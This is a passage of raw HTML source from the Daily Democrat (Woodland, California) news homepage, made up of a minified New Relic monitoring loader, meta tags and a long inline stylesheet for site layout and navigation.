u=navigator.userAgent,f=u.match(a);f&&u.indexOf("Chrome")===-1&&u.indexOf("Chromium")===-1&&(o="Safari",i=f[1])}n.exports={agent:o,version:i,match:r}},{}],3:[function(e,n,t){function r(e,n){var t=[],r="",i=0;for(r in e)o.call(e,r)&&(t[i]=n(r,e[r]),i+=1);return t}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],4:[function(e,n,t){function r(e,n,t){n||(n=0),"undefined"==typeof t&&(t=e?e.length:0);for(var r=-1,o=t-n||0,i=Array(o<0?0:o);++r<o;)i[r]=e[n+r];return i}n.exports=r},{}],5:[function(e,n,t){n.exports={exists:"undefined"!=typeof window.performance&&window.performance.timing&&"undefined"!=typeof window.performance.timing.navigationStart}},{}],ee:[function(e,n,t){function r(){}function o(e){function n(e){return e&&e instanceof r?e:e?f(e,u,i):i()}function t(t,r,o,i){if(!d.aborted||i){e&&e(t,r,o);for(var a=n(o),u=v(t),f=u.length,c=0;c<f;c++)u[c].apply(a,r);var p=s[y[t]];return p&&p.push([b,t,r,a]),a}}function l(e,n){h[e]=v(e).concat(n)}function m(e,n){var t=h[e];if(t)for(var r=0;r<t.length;r++)t[r]===n&&t.splice(r,1)}function v(e){return h[e]||[]}function g(e){return p[e]=p[e]||o(t)}function w(e,n){c(e,function(e,t){n=n||"feature",y[t]=n,n in s||(s[n]=[])})}var h={},y={},b={on:l,addEventListener:l,removeEventListener:m,emit:t,get:g,listeners:v,context:n,buffer:w,abort:a,aborted:!1};return b}function i(){return new r}function a(){(s.api||s.feature)&&(d.aborted=!0,s=d.backlog={})}var u="nr@context",f=e("gos"),c=e(3),s={},p={},d=n.exports=o();d.backlog=s},{}],gos:[function(e,n,t){function r(e,n,t){if(o.call(e,n))return e[n];var r=t();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,n,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[n]=r,r}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],handle:[function(e,n,t){function r(e,n,t,r){o.buffer([e],r),o.emit(e,n,t)}var o=e("ee").get("handle");n.exports=r,r.ee=o},{}],id:[function(e,n,t){function r(e){var n=typeof e;return!e||"object"!==n&&"function"!==n?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");n.exports=r},{}],loader:[function(e,n,t){function r(){if(!E++){var e=x.info=NREUM.info,n=l.getElementsByTagName("script")[0];if(setTimeout(s.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&n))return s.abort();c(y,function(n,t){e[n]||(e[n]=t)}),f("mark",["onload",a()+x.offset],null,"api");var t=l.createElement("script");t.src="https://"+e.agent,n.parentNode.insertBefore(t,n)}}function o(){"complete"===l.readyState&&i()}function i(){f("mark",["domContent",a()+x.offset],null,"api")}function a(){return O.exists&&performance.now?Math.round(performance.now()):(u=Math.max((new Date).getTime(),u))-x.offset}var u=(new Date).getTime(),f=e("handle"),c=e(3),s=e("ee"),p=e(2),d=window,l=d.document,m="addEventListener",v="attachEvent",g=d.XMLHttpRequest,w=g&&g.prototype;NREUM.o={ST:setTimeout,SI:d.setImmediate,CT:clearTimeout,XHR:g,REQ:d.Request,EV:d.Event,PR:d.Promise,MO:d.MutationObserver};var h=""+location,y={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1123.min.js"},b=g&&w&&w[m]&&!/CriOS/.test(navigator.userAgent),x=n.exports={offset:u,now:a,origin:h,features:{},xhrWrappable:b,userAgent:p};e(1),l[m]?(l[m]("DOMContentLoaded",i,!1),d[m]("load",r,!1)):(l[v]("onreadystatechange",o),d[v]("onload",r)),f("mark",["firstbyte",u],null,"api");var E=0,O=e(5)},{}]},{},["loader"]);</script><meta name="application-name" id="app-name" content="dailydemocrat"><link rel="pingback" href="https://www.dailydemocrat.com/xmlrpc.php"><meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="msvalidate.01" content="4B535F7EB2971D1FCBA5D1D3E3E292C3" /> <title>Daily Democrat &#8211; Woodland News: Breaking News, Sports, Business, Entertainment &amp; Woodland News</title> <script type='text/javascript'> /* <![CDATA[ */ var scriptHelpers = {"staticPath":"https:\/\/assets.digitalfirstmedia.com\/prod\/static"}; /* ]]> */ </script> <style>body{--primary:#3f51b5;--secondary:#eeff41;--tertiary:#303f9f}:root{--primary:#006fb7;--secondary:#d70000;--tertiary:#ffc518}@font-face{font-family:icomoon;src:url(../fonts/icomoon.eot);font-weight:400;font-style:normal}.icon-hamburger,.icon-plus,.icon-search,.icon-slideshow,.nav-primary .menu .menu-item-has-children>a:after,.pushnav .menu-item-has-children:not(.nav-alt-links)>a:before{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;font-family:icomoon;font-style:normal;font-variant:normal;font-weight:400;-ms-flex-pack:center;justify-content:center;line-height:1;speak:none;text-transform:none;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.icon-hamburger:before,.icon-plus:before,.icon-search:before,.icon-slideshow:before,.pushnav .menu-item-has-children:not(.nav-alt-links)>a:before{color:inherit;font-size:inherit}.icon-hamburger:before{content:"\E602"}.icon-search:before{content:"\E609"}.icon-plus:before{content:"\E606"}.icon-slideshow:before{content:"\E60B"}a,article,aside,body,div,figure,form,h1,h2,h5,h6,header,html,img,label,li,nav,p,section,span,time,ul{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}article,aside,figure,header,nav,section{display:block}body{line-height:1}ul{list-style:none}button,input[type=submit]{border:none;background-color:transparent;font-size:inherit;appearance:none;-webkit-appearance:none;-moz-appearance:none}#content,.nav-primary .navigation-inner,.status-bar .status-bar-wrapper,.trending-bar .trending-bar-wrapper{max-width:81.25em;margin:0 auto;padding:0 .625rem}@media (min-width:80em){.busy .headline-list,.feature-media .media-feature-more,.feature-primary .sidebar-ad-container{width:calc(25% - 15px);width:calc(25% - .94rem)}}@media (min-width:80em){.feature-primary .feature-large>.article-info{width:calc(43.75% - 12px);width:calc(43.75% - .71rem)}}@media (min-width:80em){.busy .feature-small{width:calc(50% - 10px);width:calc(50% - .63rem)}}@media (min-width:80em){.feature-primary .feature-large>figure{width:calc(56.25% - 9px);width:calc(56.25% - .55rem)}}@media (min-width:80em){.busy .feature-left,.busy .feature-wrapper{width:calc(75% - 5px);width:calc(75% - .32rem)}}@media (min-width:80em){.busy .feature-small .article-info,.busy .feature-small figure{width:100%}}@media (min-width:65em) and (max-width:79.9375em){.busy .headline-list,.busy .sidebar-ad-container{width:calc(30.76923% - 14px);width:calc(30.76923% - .87rem)}}@media (min-width:65em) and (max-width:79.9375em){.busy .feature-left,.busy .feature-wrapper{width:calc(69.23077% - 7px);width:calc(69.23077% - .39rem)}}@media (min-width:65em) and (max-width:79.9375em){.busy .feature-small{width:100%}}@media (min-width:50em) and (max-width:64.9375em){.busy .headline-list,.feature-primary .sidebar-ad-container{width:calc(40% - 12px);width:calc(40% - .75rem)}}@media (min-width:50em) and (max-width:64.9375em){.busy .feature-small{width:calc(50% - 10px);width:calc(50% - .63rem)}}@media (min-width:50em) and (max-width:64.9375em){.busy .feature-left{width:calc(60% - 8px);width:calc(60% - .5rem)}}@media (min-width:50em) and (max-width:64.9375em){.busy .feature-small .article-info,.busy .feature-small figure,.busy .feature-wrapper,.busy .sidebar-ad-container{width:100%}}@media (min-width:40em) and (max-width:49.9375em){.busy .feature-small,.feature-primary .feature-large>.article-info,.feature-primary .feature-large>figure{width:calc(50% - 10px);width:calc(50% - .63rem)}}@media (min-width:40em) and (max-width:49.9375em){.busy .feature-left,.busy .feature-wrapper,.feature-primary .sidebar-ad-container{width:100%}}@media (min-width:20em) and (max-width:39.9375em){.busy .feature-left,.busy .feature-small,.busy .feature-wrapper{width:100%}}html{box-sizing:border-box;font-size:100%}html *,html :after,html :before{box-sizing:inherit}html a{text-decoration:none}body{font-family:Helvetica,sans-serif;font-size:100%;margin:0;text-shadow:1px 1px 1px rgba(0,0,0,.004);-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}h1{font:normal 600 2.25em/1.16667 Lora,Helvetica,sans-serif}h2{font:normal 600 1.875em/1.06667 Lora,Helvetica,sans-serif}h5{font:normal 600 1.125em/1.22222 Lora,Helvetica,sans-serif}h6{font:normal 600 1em/1.25 Lora,Helvetica,sans-serif}a{color:inherit}img{display:block;height:auto;max-width:100%}body,html{-webkit-overflow-scrolling:touch}#page{position:relative;overflow-x:hidden;overflow-y:auto}@media (max-width:64.9375em){#page #content,#page .status-bar{-webkit-backface-visibility:hidden;backface-visibility:hidden}}#content{margin-bottom:1em}.page-content>*{margin-bottom:spacing(3)}#content:after,.archive-view:after,.dfp-ad:after,.feature-media ul:after,.feature-video ul:after,.nav-primary .navigation-inner:after,.search-form.slide-search:after,.site-header:after,.status-bar .status-bar-wrapper:after,.trending-bar .trending-bar-wrapper:after,form:after{clear:both;content:'';display:table}form input[type=submit]{font:normal 700 1em/1 Lato,Helvetica,sans-serif;background-color:var(--primary);border:none;border-radius:3px;color:#fff;min-width:6.875em;outline:none;padding:.625em .9375em;text-align:center;text-transform:uppercase}form label{font:normal 400 1em/1.5 Lato,Helvetica,sans-serif;display:inline-block}input[type=email],input[type=text]{border:1px solid #9d9a98;border-radius:0;color:#1f1e1c;height:30px;padding:.5em .625em}.search-form{position:relative}a img{border:none}figure{font-size:1rem}.image-wrapper{height:0;padding-bottom:56.25%;overflow:hidden;position:relative;width:100%}.image-wrapper img{left:0;position:absolute;top:0;width:100%}.archive-view>*{margin-bottom:.5em}.archive-view>:last-child{margin-bottom:0}.archive-view h2,.archive-view h5{margin-top:0}.archive-view header{margin-bottom:.25em}.archive-view time{font:normal 400 .75em/1.5 Lato,Helvetica,sans-serif;vertical-align:top;color:#9d9a98;white-space:nowrap}.archive-view figure{display:block;position:relative}.archive-view .excerpt{font:normal 400 1em/1.375 Lato,Helvetica,sans-serif}.archive-view .icon-slideshow{z-index:1}.headline-list{list-style:none}.headline-list li{margin-bottom:1em}.headline-list .archive-view{width:100%}.feature-primary .headline-list:before{height:100%}.headline-only{position:relative}.headline-only>:last-child{margin-bottom:1em}.feature-large figure{margin-bottom:.5em;width:100%}.feature-small figure{width:8.75em;height:auto}.busy .feature-small figure{float:left;margin:0 1.25em 0 0}@media (min-width:65em){.busy .feature-small figure{width:15em}}.busy .feature-small header{float:left}@media (max-width:64.9375em){.busy .feature-small header{width:calc(100% - 160px)}}@media (min-width:65em){.busy .feature-small header{width:calc(100% - 260px)}}@media (max-width:64.9375em){.feature-media .feature-small figure{max-width:none}}@media (max-width:64.9375em){.feature-media .feature-small h5{font:normal 600 1.875em/1.06667 Lora,Helvetica,sans-serif}}@media (max-width:64.9375em){.feature-media .feature-small{border:none;padding:0}}.site-footer .menu-item-has-children .expander{position:absolute;display:none;top:0;right:0;width:2.9375em;height:2.9375em;text-align:center;z-index:4}.site-footer .menu-item-has-children .expander a{position:relative;display:inline-block;line-height:3;vertical-align:middle}@media (max-width:39.9375em){.site-footer .menu-item-has-children .expander{display:block}}.site-header{background-color:#fff;margin-bottom:1.5em;padding-top:.625em;position:relative;z-index:6}@media (min-width:65em){.site-header{padding-top:2.5em;height:auto}}@media (max-width:64.9375em){.site-header{-webkit-transform:translate(0);transform:translate(0)}.site-header .nav-wrapper{-webkit-transform:translateY(0);transform:translateY(0)}.site-header .slide-search{-webkit-transform:translateY(-3.75em);transform:translateY(-3.75em)}}.status-bar ul{float:right}.status-bar ul li{font:normal 400 .875em/1.28571 Lato,Helvetica,sans-serif;display:inline-block}.status-bar ul a{text-decoration:none;color:#1f1e1c}@media (max-width:64.9375em){.status-bar{display:none}}.nav-primary{display:block;position:relative;text-align:center;width:100%}@media (max-width:64.9375em){.nav-primary{overflow:hidden}}.nav-primary .subscribe-special.menu-large>a{background-color:var(--primary);padding-top:9px;padding-bottom:9px;color:#fff;width:100%;text-align:center}.nav-primary .menu-main-navigation-container{font-family:Lato,Helvetica,sans-serif;position:relative;height:3.75em}@media (max-width:64.9375em){.nav-primary .menu-main-navigation-container{margin:0 -10px}}.nav-primary .menu{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;height:100%;padding:0}@media (max-width:64.9375em){.nav-primary .menu{-ms-flex-pack:center;justify-content:center}}.nav-primary .menu>li{margin-right:1.5625em;font-size:1rem}@media (max-width:64.9375em){.nav-primary .menu>li{border-right:1px solid #fff}.nav-primary .menu>li:last-child{border:none}}.nav-primary .menu>li>a{font:normal 700 1em/1 Lato,Helvetica,sans-serif;display:block}@media (max-width:64.9375em){.nav-primary .menu>li>a{border:none;display:inline-block;font-weight:700;padding-right:.625em}}.nav-primary .menu .menu-item-has-children{position:relative}.nav-primary .menu .menu-item-has-children>a,.nav-primary .menu .menu-item-has-children>a:after{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex}.nav-primary .menu .menu-item-has-children>a:after{content:"\E10F";-ms-flex-pack:center;justify-content:center;margin-left:.15em}.nav-primary .menu .menu-item-has-children ul{background-color:#1f1e1c;display:none;-ms-flex-wrap:wrap;flex-wrap:wrap;-ms-flex-direction:column;flex-direction:column;-ms-flex-pack:start;justify-content:flex-start;padding:1em;position:absolute;top:100%;width:28.125em;z-index:7}.nav-primary .menu .menu-item-has-children ul li{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;max-height:3.125em;width:calc(50% - 1em)}.nav-primary .menu .menu-item-has-children ul a{border-bottom:1px solid #484642;color:#fff;display:block;padding:1em 0;width:100%}.nav-primary li{display:inline-block}.nav-primary a{color:#1f1e1c;text-decoration:none}.nav-primary .icon-hamburger,.nav-primary .icon-search{display:none;font-size:2em}@media (max-width:64.9375em){.nav-primary .icon-hamburger,.nav-primary .icon-search{display:block;position:absolute;top:.46875em}}.nav-primary .icon-hamburger{left:.3125em}.nav-primary .icon-search{right:.3125em}@media (min-width:65em){.nav-primary .icon-search{font-size:1.5em;z-index:2}}.pushnav{background-color:#1f1e1c;height:100%;overflow:auto;position:fixed;width:260px;z-index:7;display:none}.pushnav li>a{border-bottom:1px solid #484642;display:block;width:100%;padding:.9375em .625em;color:#fff}.pushnav .menu-item-has-children:not(.nav-alt-links){overflow:hidden;position:relative}.pushnav .menu-item-has-children:not(.nav-alt-links) li:last-child{border-bottom:0}.pushnav .menu-item-has-children:not(.nav-alt-links)>a{background-color:#1f1e1c;display:inline-block;position:relative;width:100%;z-index:4}.pushnav .menu-item-has-children:not(.nav-alt-links)>a:before{-ms-flex-align:center;align-items:center;color:#fff;content:'\E10F';display:-ms-flexbox;display:flex;font-size:1.125em;height:100%;-ms-flex-pack:end;justify-content:flex-end;padding-right:.9375em;position:absolute;top:0;right:0}.pushnav .menu-item-has-children:not(.nav-alt-links)>ul{position:relative;background-color:#1f1e1c;-webkit-transform:translateY(-200%);transform:translateY(-200%);z-index:3}.pushnav .menu-item-has-children:not(.nav-alt-links)>ul a{padding:.625em}.trending-bar{float:left;position:relative;font-family:Lato,Helvetica,sans-serif;width:100%}@media (max-width:64.9375em){.trending-bar{position:absolute;display:none;top:7.3125em;left:0;margin:0;z-index:5}}.trending-bar nav{width:100%;padding-left:5.625em;display:inline-block;float:left}@media (max-width:64.9375em){.trending-bar nav{padding-left:0}}.trending-bar ul{list-style:none;float:left;width:100%;overflow:hidden}@media (min-width:65em){.trending-bar ul{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;-ms-flex-pack:distribute;justify-content:space-around}}@media (max-width:64.9375em){.trending-bar ul{width:100%;height:auto;overflow:visible}}@media (max-width:64.9375em){.trending-bar li{display:block;float:none;line-height:1.25;margin:0}.trending-bar li:last-child a{border:none}}.trending-bar a{text-decoration:none}@media (max-width:64.9375em){.trending-bar a{border-bottom:1px solid #c8c4c0;color:#1f1e1c;display:block;font-size:.9375em;padding:1em}}.trending-bar .trending-bar-wrapper>p{position:absolute;top:.1875em;font-weight:800;line-height:1.875em}@media (max-width:64.9375em){.trending-bar .trending-bar-wrapper{padding:0}}@media (max-width:64.9375em){.trending-bar .label{display:none}}.logo{display:inline-block;font-size:1rem;position:relative}.logo a{overflow:hidden;text-indent:-9999px}.logo.custom-logo img{margin:0 auto;max-height:100%}.logo.custom-logo a{background-image:none}.dfp-ad,.newsletter-simple{position:relative}.dfp-ad{display:block;font-size:1rem;margin:0 auto;overflow:hidden;text-align:center}.dfp-ad.dfp-top_leaderboard{clear:both;margin:0 auto 1.5em;top:0;width:100%}@media (max-width:49.9375em){.feature-primary .dfp-ad{padding-bottom:1em}}@media (max-width:750px){.header-banners{box-sizing:content-box;padding:0 10px;left:-10px;position:relative}}.search-form{display:inline-block;position:relative}@media (max-width:64.9375em){.search-form{padding:.625em}}.search-form input[type=submit]{display:inline-block;width:16.36364em}.search-form.header-search,.search-form.slide-search{clear:both;margin:0 auto}.search-form.header-search input[type=text],.search-form.slide-search input[type=text]{font:normal 400 1.125em/1.22222 Lato,Helvetica,sans-serif;height:3.05556em;width:100%}.search-form.header-search,.search-form.slide-search{height:3.75em}.search-form.header-search input[type=submit],.search-form.slide-search input[type=submit]{display:none}.search-form.header-search input[type=text],.search-form.slide-search input[type=text]{height:100%}.search-form.header-search{display:none;height:2.5em;margin-top:.625em;position:absolute;right:.625em;width:10.9375em;z-index:1}@media (min-width:65em){.search-form.header-search{display:block}}.search-form.slide-search{display:none;position:absolute;width:100%}@media (max-width:64.9375em){.search-form.slide-search{display:block;top:0}}@media (min-width:20em) and (max-width:39.9375em){.search-form.slide-search{float:none;width:100%}}#sharing_email{background-color:#fff;left:50%!important;position:absolute;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);top:50%!important;width:25em;padding:1.5em;z-index:8;box-shadow:0 .0625em 2em rgba(0,0,0,.3)}@media (max-width:39.9375em){#sharing_email{width:100%}}#sharing_email input[type=email],#sharing_email input[type=text],#sharing_email label{display:block;width:100%}#sharing_email input[type=email],#sharing_email input[type=text]{margin-bottom:2em}#sharing_email label:after{content:":"}#sharing_email .sharing_cancel{line-height:2;display:inline-block;padding:.3125em}.homepage>*{margin-bottom:2em}body{background-color:#fbfbfb}.busy .headline-list-title{font:normal 700 1.0625em/1.11765 Lato,Helvetica,sans-serif;color:var(--primary);display:-ms-flexbox;display:flex;letter-spacing:.035em;margin-bottom:1em;padding-bottom:.5em;text-transform:uppercase}.busy .headline-list-title span{display:-ms-flexbox;display:flex;-ms-flex-pack:start;justify-content:flex-start}.archive-view{display:-ms-flexbox;display:flex;font-size:1rem;-ms-flex-pack:justify;justify-content:space-between;position:relative}.archive-view header{width:100%}.archive-view .article-info{display:inline-block;margin-bottom:0}.archive-view .entry-meta{display:inline}.archive-view .excerpt{font:400 .9375rem/1.4 Lato,Helvetica,sans-serif;margin-bottom:.5em;color:#484642}.feature-primary .feature-large{border-bottom:1px solid #c8c4c0;padding-bottom:1em;text-align:center;-ms-flex-direction:column;flex-direction:column;-ms-flex-wrap:wrap;flex-wrap:wrap}@media (min-width:40em) and (max-width:49.9375em){.feature-primary .feature-large{-ms-flex-direction:row;flex-direction:row}}@media (min-width:80em){.feature-primary .feature-large{-ms-flex-direction:row;flex-direction:row}}.feature-primary .feature-large>figure{display:none;-ms-flex-order:1;order:1}@media (min-width:40em) and (max-width:49.9375em){.feature-primary .feature-large>figure{display:block}}@media (min-width:80em){.feature-primary .feature-large>figure{display:block}}.feature-primary .feature-large header .entry-title{font:normal 700 1.5625em/1.16 Lora,Helvetica,sans-serif;letter-spacing:-.03em;margin-bottom:.36364em}@media (min-width:40em){.feature-primary .feature-large header .entry-title{font-size:1.8125em;line-height:1.13}}@media (min-width:40em) and (max-width:49.9375em){.feature-primary .feature-large>.article-info figure{display:none}}@media (min-width:80em){.feature-primary .feature-large>.article-info figure{display:none}}.feature-primary .feature-large .excerpt{font:normal 400 .9375em/1.26667 Lato,Helvetica,sans-serif;margin-bottom:1em}.feature-primary .feature-large .dfm-featured-top-flex-container{width:100%}.busy .feature-small{display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;-ms-flex-pack:justify;justify-content:space-between;margin-bottom:1em;padding-bottom:1em}@media (min-width:65em) and (max-width:79.9375em){.busy .feature-small{-ms-flex-direction:row;flex-direction:row}}@media (max-width:49.9375em){.busy .feature-small{-ms-flex-direction:row;flex-direction:row}}@media (min-width:65em) and (max-width:79.9375em){.busy .feature-small figure{width:calc(25% - 15px);width:calc(25% - .94rem)}}@media (min-width:40em) and (max-width:49.9375em){.busy .feature-small figure{width:calc(33.33333% - 14px);width:calc(33.33333% - .84rem)}}@media (min-width:20em) and (max-width:39.9375em){.busy .feature-small figure{width:calc(33.33333% - 14px);width:calc(33.33333% - .84rem)}}@media (min-width:65em) and (max-width:79.9375em){.busy .feature-small .article-info{width:calc(75% - 5px);width:calc(75% - .32rem)}}@media (min-width:40em) and (max-width:49.9375em){.busy .feature-small .article-info{width:calc(66.66667% - 7px);width:calc(66.66667% - .42rem)}}@media (min-width:20em) and (max-width:39.9375em){.busy .feature-small .article-info{width:calc(66.66667% - 7px);width:calc(66.66667% - .42rem)}}.busy .feature-small header{width:100%}.busy .feature-small figure{max-width:100%;margin-bottom:.5em}@media (min-width:65em){.busy .feature-small figure{width:100%}}.busy .feature-small .entry-title{font-weight:700}@media (min-width:40em){.busy .feature-small .entry-title{font-size:1em;line-height:1.18}}@media (min-width:65em){.busy .feature-small .entry-title{font-size:1.125em;line-height:1.2}}@media (min-width:80em){.busy .feature-small .entry-title{font-size:1.25em;line-height:1.18;letter-spacing:-.02em}}.feature-small .icon-slideshow{background-color:#1f1e1c;border:1px solid #fff;border-radius:50%;color:#fff;font-size:.75em;height:1.66667em;position:absolute;width:1.66667em;bottom:.41667em;left:.41667em;left:auto;opacity:.85;right:.3125em}.headline-only h6{display:inline-block}.busy,.busy .feature-wrapper{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-ms-flex-pack:justify;justify-content:space-between}@media (max-width:49.9375em){.busy .feature-wrapper{-ms-flex-direction:column;flex-direction:column}.busy .feature-wrapper>*{margin-bottom:2em}.busy .feature-wrapper>:last-child{margin-bottom:0}}@media (min-width:65em){.busy .feature-wrapper{margin-bottom:2em}}.busy .feature-left{display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;-ms-flex-pack:start;justify-content:flex-start}@media (max-width:64.9375em){.busy .feature-left{-ms-flex-direction:column;flex-direction:column}}.busy .feature-top{margin-bottom:1.25rem}.busy .feature-bottom{display:-ms-flexbox;display:flex;-ms-flex-pack:justify;justify-content:space-between;-ms-flex-wrap:wrap;flex-wrap:wrap}@media (max-width:39.9375em){.busy .headline-list{max-width:33.75em;margin-left:auto;margin-right:auto}}.busy .headline-list>ul>li{border-top:1px solid #c8c4c0;margin:.75em 0 0;padding-top:1em}.busy .headline-list>ul>li:first-child{border-top:0;margin-top:0;padding-top:0}.busy .headline-list>ul>li:last-child{border-top:0}.busy .headline-only header{margin:0}.busy .headline-only time{font:normal 400 .8125em/1.76923 Lato,Helvetica,sans-serif;color:#c8c4c0;display:inline}.busy .headline-only .entry-title{font:normal 600 .9375em/1.26667 Lora,Helvetica,sans-serif;display:inline}.busy .social-links{background-color:#f5f3f0;-ms-flex-direction:column;flex-direction:column}.busy .social-links>*{padding:1em}.busy .newsletter-simple{border-bottom:1px solid #fff}.feature-media .more-videos{padding:.875em 0;display:none}@media (max-width:64.9375em){.feature-media .more-videos{padding:0 0 .625em}}.feature-media .media-feature-more{padding-bottom:1.25em;float:left}@media (min-width:65em) and (max-width:79.9375em){.feature-media .media-feature-more{width:calc(25% - 15px);width:calc(25% - .94rem)}}.feature-media .media-feature-more .feature-small{-ms-flex-direction:column;flex-direction:column}.feature-media .media-feature-more .feature-small .entry-title{font:normal 700 .9375em/1.26667 Lora,Helvetica,sans-serif;margin-bottom:.41379em;letter-spacing:-.04em}.feature-media .media-feature-more .feature-small.archive-view{-ms-flex-direction:column;flex-direction:column}.feature-media .media-feature-more .feature-small figure{max-width:100%}@media (min-width:20em) and (max-width:39.9375em){.feature-media .media-feature-more{width:calc(50% - 15px);margin-right:1.25rem;margin-bottom:2em}.feature-media .media-feature-more:nth-child(2n+1){clear:left}.feature-media .media-feature-more:nth-child(2n){margin-right:0}}@media (min-width:40em) and (max-width:49.9375em){.feature-media .media-feature-more{width:calc(50% - 15px);margin-right:1.25rem;margin-bottom:2em}.feature-media .media-feature-more:nth-child(2n+1){clear:left}.feature-media .media-feature-more:nth-child(2n){margin-right:0}}@media (min-width:50em) and (max-width:64.9375em){.feature-media .media-feature-more{width:calc(33% - 15px);margin-right:1.25rem}.feature-media .media-feature-more:nth-child(3n+1){clear:left}.feature-media .media-feature-more:nth-child(3n){margin-right:0}}@media (min-width:65em) and (max-width:79.9375em){.feature-media .media-feature-more{margin-right:1.25rem;width:calc(25% - 15px);margin-bottom:2em}.feature-media .media-feature-more:nth-child(4n+1){clear:left}.feature-media .media-feature-more:nth-child(4n){margin-right:0}}@media (min-width:80em){.feature-media .media-feature-more{margin-right:1.25rem;width:calc(25% - 15px);margin-bottom:2em}.feature-media .media-feature-more:nth-child(4n+1){clear:left}.feature-media .media-feature-more:nth-child(4n){margin-right:0}}.feature-media .media-feature-more figure{width:100%}.site-footer .menu-item-has-children .expander{position:static}.site-footer .menu-item-has-children .expander a{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;height:100%;-ms-flex-pack:center;justify-content:center}.site-footer .menu-item-has-children .expander a:before{display:none}.site-footer .menu-item-has-children .expander a:after{content:'';border-bottom:7px solid transparent;border-left:5px solid transparent;border-right:5px solid transparent;border-top:7px solid #c8c4c0;margin:.3em 0 0 .25em}.header-placeholder{display:none}@media (max-width:39.9375em){.header-placeholder{height:120px}}@media (min-width:40em) and (max-width:64.9375em){.header-placeholder{height:146px}}@media (min-width:65em){.header-placeholder{height:185px}}.site-header{background-color:transparent}@media (max-width:39.9375em){.site-header{padding-top:0;height:7.5em}}@media (max-width:64.9375em){.site-header{padding:0;height:7.8125em;margin-bottom:0}}@media (min-width:65em){.site-header{margin-bottom:1.5em;padding:5em 0 1.0625em}}.site-header .dfp-Sponsorship_1{display:none}@media (min-width:65em){.site-header .dfp-Sponsorship_1{position:absolute;right:.625em;top:-4.25em}}@media (max-width:64.9375em){.site-header .dfp-Sponsorship_1{position:static;margin-left:auto}}@media (min-width:1040px){.site-header .dfp-Sponsorship_1{display:block}}.logo{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex}@media (max-width:64.9375em){.logo{margin-left:.625em}}@media (min-width:65em){.logo{margin-bottom:0;position:absolute;text-align:left;top:-4.375em;width:100%}}.logo a{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;height:55px;margin:0 .625em;position:relative;text-indent:0;width:420px}@media (min-width:40em) and (max-width:64.9375em){.logo a{margin:1.125em 0;height:40px;width:300px}}@media (max-width:39.9375em){.logo a{margin:.875em 0 .625em;height:26px;width:200px}}.nav-primary{border-bottom:1px solid #c8c4c0;margin-bottom:0;max-width:none}@media (min-width:65em){.nav-primary{border-top:5px solid #484642;padding:0;text-align:left}}@media (min-width:40em) and (max-width:64.9375em){.nav-primary{margin-bottom:0;border-bottom:none}}@media (max-width:64.9375em){.nav-primary{overflow:visible}}.nav-primary .navigation-inner{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;-ms-flex-pack:start;justify-content:flex-start;position:relative}@media (max-width:64.9375em){.nav-primary .navigation-inner{border-bottom:.1875em solid #484642;-ms-flex-wrap:wrap;flex-wrap:wrap;padding:0}}.nav-primary .menu-main-navigation-container{height:3.125em}@media (max-width:64.9375em){.nav-primary .menu-main-navigation-container{display:none}}@media (min-width:65em) and (max-width:79.9375em){.nav-primary .menu-main-navigation-container{width:80vw}.nav-primary .menu-main-navigation-container .subscribe-special.menu-large>a{width:10.15em}}@media (min-width:80em){.nav-primary .menu-main-navigation-container{width:calc(100% - 18.75em)}.nav-primary .menu-main-navigation-container .subscribe-special.menu-large>a{width:10em}}.nav-primary .menu{padding:0}@media (max-width:64.9375em){.nav-primary .menu{-ms-flex-pack:start;justify-content:flex-start}}.nav-primary .menu>li{margin:0}@media (max-width:64.9375em){.nav-primary .menu>li{border:0}.nav-primary .menu>li.menu-large{display:none}}.nav-primary .menu>li>a{font:normal 600 .9375em/1.73333 Lato,Helvetica,sans-serif;-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex}@media (max-width:64.9375em){.nav-primary .menu>li>a{padding-left:.625em}}@media (max-width:79.9375em){.nav-primary .menu>li>a{font-size:.9375em}}@media (min-width:65em) and (max-width:79.9375em){.nav-primary .menu>li>a{padding:0 1.28vw}}@media (min-width:80em){.nav-primary .menu>li>a{padding:0 .88235em}}.nav-primary .menu>li:last-child>a{border-right:0}@media (min-width:65em) and (max-width:79.9375em){.nav-primary .menu>li:first-child>a{padding-left:.71429em}}@media (min-width:80em){.nav-primary .menu>li:first-child>a{padding-left:.55556em}}@media (max-width:39.9375em){.nav-primary .menu .menu-item-has-children{position:static}}.nav-primary .menu .menu-item-has-children ul{background-color:var(--primary);-webkit-column-count:2;-moz-column-count:2;column-count:2}.nav-primary .menu .menu-item-has-children ul a{border-bottom:1px solid #606fc7}@media (max-width:64.9375em){.nav-primary .menu .menu-item-has-children>a:after{display:none}}.nav-primary .menu .menu-item-has-children>a:after{content:'';border-bottom:7px solid transparent;border-left:5px solid transparent;border-right:5px solid transparent;border-top:7px solid #c8c4c0;margin:.55em 0 0 .35em}.nav-primary .icon-hamburger,.nav-primary .icon-search{position:static}@media (max-width:64.9375em){.nav-primary .icon-hamburger,.nav-primary .icon-search{font-size:1.375em}}@media (max-width:64.9375em){.nav-primary .icon-search{margin:0 .625em 0 